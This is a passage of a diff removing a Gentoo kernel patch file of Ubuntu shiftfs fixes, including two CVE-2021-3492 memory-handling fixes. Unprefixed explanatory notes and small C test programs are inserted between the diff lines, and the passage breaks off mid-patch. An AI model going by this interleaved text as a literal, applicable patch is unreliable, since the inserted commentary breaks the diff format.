- 	inode_unlock(loweri);
- 
- 	shiftfs_copyattr(loweri, dir);
-+	dput(lowerd);
- 
- 	return err;
- }
--- 
-2.39.2
-
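The two added lines follow a common VFS lifetime idiom (the commit
compares it to ecryptfs): hold an extra reference for exactly the
window in which the object is still dereferenced. A condensed sketch of
the shape, mirroring the hunk above (a fragment, not standalone code):

 dget(lowerd);                 /* pin: unlink may drop the last ref */
 err = vfs_unlink(loweri, lowerd, NULL);
 /* lowerd is still safe to touch here even if it went negative */
 dput(lowerd);                 /* unpin once we are done with it */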
-From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 10 Apr 2020 16:55:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872094
-
-When shiftfs is nested we were unable to create any files or access
-directories because we recorded the wrong creator credentials. We
-need to record the credentials of the creator of the lower mark mount
-of shiftfs; otherwise we aren't privileged with respect to the shiftfs
-layer in the nesting case. This is similar to how we always record
-the user namespace of the base filesystem.
-
-Suggested-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 17 +++++++++--------
- 1 file changed, 9 insertions(+), 8 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3623d02b061e..5c39529d0a17 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * parent mark mountpoint.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
-+			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * are identical.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
--		}
- 
--		cred_tmp = prepare_creds();
--		if (!cred_tmp) {
--			err = -ENOMEM;
--			goto out_put_path;
-+			cred_tmp = prepare_creds();
-+			if (!cred_tmp) {
-+				err = -ENOMEM;
-+				goto out_put_path;
-+			}
-+			/* Don't override disk quota limits or use reserved space. */
-+			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+			sbinfo->creator_cred = cred_tmp;
- 		}
--		/* Don't override disk quota limits or use reserved space. */
--		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
--		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 20 May 2020 13:44:27 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
- from other users
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1879688
-
-Stéphane reported a bug found during NorthSec, which makes heavy use
-of shiftfs. When a subvolume or snapshot is created as userns root in
-the container and then chowned to another user, a delete as the root
-user will fail. The reason for this is that we drop all capabilities as a
-safety measure before calling btrfs ioctls. The only workable fix I
-could think of is to retain the CAP_DAC_OVERRIDE capability for the
-BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
-invasive.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 ++++++++++++--
- 1 file changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5c39529d0a17..5d88193b41db 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
- 	return ret;
- }
- 
--static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 	cap_clear((*newcred)->cap_inheritable);
- 	cap_clear((*newcred)->cap_permitted);
- 
-+	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
-+		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
-+		/*
-+		 * Allow the root user in the container to remove subvolumes
-+		 * from other users.
-+		 */
-+		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
-+			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
-+	}
-+
- 	put_cred(override_creds(*newcred));
- 	return 0;
- }
-@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	if (ret)
- 		goto out_restore;
- 
--	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
- 	if (ret)
- 		goto out_fdput;
- 
--- 
-2.39.2
-
-From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Mon, 15 Jun 2020 15:16:11 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
- fiemap definitions
-Cc: mpagano@gentoo.org
-
-shiftfs FTBFS with 5.8-rc1:
-
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
-
-It seems that shiftfs was getting linux/fiemap.h included
-indirectly before. Include it directly.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5d88193b41db..f9a5c94a9793 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -20,6 +20,7 @@
- #include <linux/posix_acl.h>
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
-+#include <linux/fiemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Tue, 23 Jun 2020 19:46:16 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
- lookups
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872757
-
-Users reported that when creating temporary files shiftfs reports
-ESTALE. This can be reproduced via:
-
-import tempfile
-import os
-
-def test():
-    with tempfile.TemporaryFile() as fd:
-        fd.write("data".encode('utf-8'))
-        # re-open the file to get a read-only file descriptor
-        return open(f"/proc/self/fd/{fd.fileno()}", "r")
-
-def main():
-   fd = test()
-   fd.close()
-
-if __name__ == "__main__":
-    main()
-
-A similar issue was reported here:
-https://github.com/systemd/systemd/issues/14861
-
-Our revalidate methods were very opinionated about whether or not a
-lower dentry was valid: especially when it became unlinked, we simply
-invalidated the lower dentry, which caused the above bug to surface.
-This has led to bugs where an ESTALE was returned for e.g. temporary
-files that were created and directly re-opened afterwards through
-/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
-/proc/<pid>/fd/<nr>, LOOKUP_JUMP is set and the vfs will revalidate
-via d_weak_revalidate(). Since the file has been unhashed or has even
-already gone negative, we'd fail the open when we should have
-succeeded.
-
-Reported-by: Christian Kellner <ckellner@redhat.com>
-Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Link: https://github.com/systemd/systemd/issues/14861
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f9a5c94a9793..3cfd1881e9a2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
-@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
--- 
-2.39.2
-
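The Python reproducer above translates directly to C: create a file,
unlink it so it becomes unhashed, then re-open it through
/proc/self/fd. A minimal sketch of the access pattern that
d_weak_revalidate() has to tolerate (file name and buffer size are
arbitrary):

 #include <fcntl.h>
 #include <stdio.h>
 #include <unistd.h>
 #include <err.h>

 int main(void)
 {
 	int fd = open("tmpfile", O_RDWR | O_CREAT, 0600);
 	if (fd < 0) err(1, "open");
 	if (unlink("tmpfile")) err(1, "unlink"); /* now unhashed */

 	char path[64];
 	snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
 	/* Re-opening takes the LOOKUP_JUMP path; before the fix this
 	 * failed with ESTALE on shiftfs. */
 	int fd2 = open(path, O_RDONLY);
 	if (fd2 < 0) err(1, "re-open via /proc");
 	return 0;
 }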
-From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 30 Dec 2020 11:10:20 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
-Cc: mpagano@gentoo.org
-
-After commit:
-
- 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
-
-__close_fd() has been renamed to close_fd() and the files parameter has
-been removed.
-
-Change the shiftfs code to properly support this change.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3cfd1881e9a2..4f1d94903557 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	__close_fd(current->files, fd);
-+	close_fd(fd);
- 	kfree(v1);
- 	kfree(v2);
- 
-@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	/*
- 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
- 	 * take a reference here to offset the one which will be put by
--	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 * close_fd(), and make sure that reference is put on fdput(lfd).
- 	 */
- 	get_file(lfd.file);
- 	lfd.flags |= FDPUT_FPUT;
--- 
-2.39.2
-
-From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:01:06 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
- shiftfs_btrfs_ioctl_fd_replace() error paths
-Cc: mpagano@gentoo.org
-
-Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
-allocated near the top of the function. Fix up these error paths to free
-the memory.
-
-Additionally, the addresses for the allocated memory are assigned to
-return parameters early in the function, before we know whether or not
-the function as a whole will return success. Wait to assign these values
-until we know the function was successful, and for good measure
-initialize the return parameters to NULL at the start.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 28 +++++++++++++++++++++-------
- 1 file changed, 21 insertions(+), 7 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4f1d94903557..8eab93691d62 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-+	*b1 = NULL;
-+	*b2 = NULL;
-+
- 	if (!is_btrfs_snap_ioctl(cmd))
- 		return 0;
- 
-@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		if (IS_ERR(v1))
- 			return PTR_ERR(v1);
- 		oldfd = v1->fd;
--		*b1 = v1;
- 	} else {
- 		v2 = memdup_user(arg, sizeof(*v2));
- 		if (IS_ERR(v2))
- 			return PTR_ERR(v2);
- 		oldfd = v2->fd;
--		*b2 = v2;
- 	}
- 
- 	src = fdget(oldfd);
--	if (!src.file)
--		return -EINVAL;
-+	if (!src.file) {
-+		ret = -EINVAL;
-+		goto err_free;
-+	}
- 
- 	ret = shiftfs_real_fdget(src.file, &lfd);
- 	if (ret) {
- 		fdput(src);
--		return ret;
-+		goto err_free;
- 	}
- 
- 	/*
-@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
- 		fdput(lfd);
--		return *newfd;
-+		ret = *newfd;
-+		goto err_free;
- 	}
- 
- 	fd_install(*newfd, lfd.file);
-@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		v2->fd = oldfd;
- 	}
- 
--	if (ret)
-+	if (!ret) {
-+		*b1 = v1;
-+		*b2 = v2;
-+	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+	}
-+
-+	return ret;
-+
-+err_free:
-+	kfree(v1);
-+	kfree(v2);
- 
- 	return ret;
- }
--- 
-2.39.2
-
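The commit combines two classic kernel error-path idioms: keep output
parameters NULL until the whole operation has succeeded, and funnel all
failures through a single cleanup label, relying on kfree(NULL) being a
no-op so the label may free both buffers even though only one was
allocated. A small userspace model of that shape (function and
parameter names are invented; free() is NULL-tolerant just like
kfree()):

 #include <errno.h>
 #include <stdlib.h>

 static int replace(int want_v2, int fail, void **b1, void **b2)
 {
 	void *v1 = NULL, *v2 = NULL;
 	int ret = 0;

 	*b1 = *b2 = NULL;               /* never publish early */

 	if (want_v2) v2 = malloc(32); else v1 = malloc(16);
 	if (!v1 && !v2)
 		return -ENOMEM;

 	if (fail) {                     /* stand-in for fdget() etc. */
 		ret = -EINVAL;
 		goto err_free;
 	}

 	*b1 = v1;                       /* publish only on success */
 	*b2 = v2;
 	return 0;

 err_free:
 	free(v1);                       /* free(NULL) is a no-op */
 	free(v2);
 	return ret;
 }

 int main(void)
 {
 	void *b1, *b2;
 	return replace(0, 1, &b1, &b2) == -EINVAL ? 0 : 1;
 }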
-From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:10:37 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
- correctly
-Cc: mpagano@gentoo.org
-
-shiftfs expects copy_to_user() to return a negative error code on
-failure, when it actually returns the amount of uncopied data. Fix all
-code using copy_to_user() to handle the return values correctly.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8eab93691d62..abeb7db3b9be 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	kfree(v1);
- 	kfree(v2);
- 
--	return ret;
-+	return ret ? -EFAULT: 0;
- }
- 
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		*b2 = v2;
- 	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+		ret = -EFAULT;
- 	}
- 
- 	return ret;
--- 
-2.39.2
-
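The underlying rule: copy_to_user() returns the number of bytes it
failed to copy (0 on complete success), never a negative errno, so the
caller has to convert at the boundary instead of propagating the raw
count. A minimal kernel-style sketch of the idiom the fix adopts
(struct stats and the function name are invented; this is not shiftfs
code and is not standalone compilable):

 /* Kernel-style sketch only. */
 static long report_to_user(void __user *dst, const struct stats *src)
 {
 	if (copy_to_user(dst, src, sizeof(*src)))
 		return -EFAULT; /* partial or failed copy */
 	return 0;               /* every byte made it across */
 }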
-From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Mon, 9 Aug 2021 17:15:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1939301
-
-Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
-caused a regression for us. It states:
-
-> default_file_splice_write is the last piece of generic code that uses
-> set_fs to make the uaccess routines operate on kernel pointers.  It
-> implements a "fallback loop" for splicing from files that do not actually
-> provide a proper splice_read method.  The usual file systems and other
-> high bandwidth instances all provide a ->splice_read, so this just removes
-> support for various device drivers and procfs/debugfs files.  If splice
-> support for any of those turns out to be important it can be added back
-> by switching them to the iter ops and using generic_file_splice_read.
-
-This means that currently all workloads making use of sendfile() on
-shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
-by providing explicit .splice_read() and .splice_write() methods,
-which just restores the status quo; we keep using generic methods
-provided by the vfs.
-
-Cc: Seth Forshee <sforshee@kernel.org>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index abeb7db3b9be..f5f6d8d8144e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.copy_file_range	= shiftfs_copy_file_range,
- 	.remap_file_range	= shiftfs_remap_file_range,
-+	.splice_read		= generic_file_splice_read,
-+	.splice_write		= iter_file_splice_write,
- };
- 
- const struct file_operations shiftfs_dir_operations = {
--- 
-2.39.2
-
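From userspace the regression showed up as sendfile(2) failing
(typically with EINVAL) on files living on shiftfs. A minimal program
exercising exactly the splice path these two methods restore (paths are
placeholders; "src" is assumed to live on the filesystem under test):

 #include <sys/sendfile.h>
 #include <sys/stat.h>
 #include <fcntl.h>
 #include <unistd.h>
 #include <err.h>

 int main(void)
 {
 	int in = open("src", O_RDONLY);
 	if (in < 0) err(1, "open src");
 	int out = open("dst", O_WRONLY | O_CREAT | O_TRUNC, 0644);
 	if (out < 0) err(1, "open dst");

 	struct stat st;
 	if (fstat(in, &st)) err(1, "fstat");

 	/* Fails without .splice_read/.splice_write after upstream
 	 * commit 36e2c7421f02. */
 	if (sendfile(out, in, NULL, st.st_size) < 0)
 		err(1, "sendfile");
 	return 0;
 }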
-From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Thu, 20 Jan 2022 16:55:24 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
-Cc: mpagano@gentoo.org
-
-WARNING: after this change we may see some regressions if shiftfs is
-used with filesystem namespaces.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
- 1 file changed, 64 insertions(+), 43 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f5f6d8d8144e..76c54bc12018 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct user_namespace *ns,
-+			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_getxattr(lowerd, name, value, size);
-+	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 	return err;
- }
- 
--static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+static int shiftfs_removexattr(struct user_namespace *ns,
-+			       struct dentry *dentry, const char *name)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(lowerd, name);
-+	err = vfs_removexattr(ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- }
- 
- static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct user_namespace *ns,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, const void *value, size_t size,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(dentry, name);
--	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(ns, dentry, name);
-+	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct user_namespace *ns,
-+				 struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(inode, diri, mode);
-+		inode_init_owner(ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 	return err;
- }
- 
--static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_create(struct user_namespace *ns,
-+			  struct inode *dir, struct dentry *dentry,
- 			  umode_t mode,  bool excl)
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
- }
- 
--static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			 umode_t mode)
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
- }
- 
--static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+static int shiftfs_mknod(struct user_namespace *ns,
-+			 struct inode *dir, struct dentry *dentry, umode_t mode,
- 			 dev_t rdev)
- {
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
--static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(loweri, lowerd);
-+		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
- 	else
--		err = vfs_unlink(loweri, lowerd, NULL);
-+		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
- 	revert_creds(oldcred);
- 
- 	if (!err) {
-@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
- 	return shiftfs_rm(dir, dentry, true);
- }
- 
--static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+static int shiftfs_rename(struct user_namespace *ns,
-+			  struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
-@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		      *trapd;
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
-+	struct renamedata rd = {
-+		.old_mnt_userns	= ns,
-+		.old_dir	= loweri_dir_old,
-+		.old_dentry	= lowerd_old,
-+		.new_mnt_userns	= ns,
-+		.new_dir	= loweri_dir_new,
-+		.new_dentry	= lowerd_new,
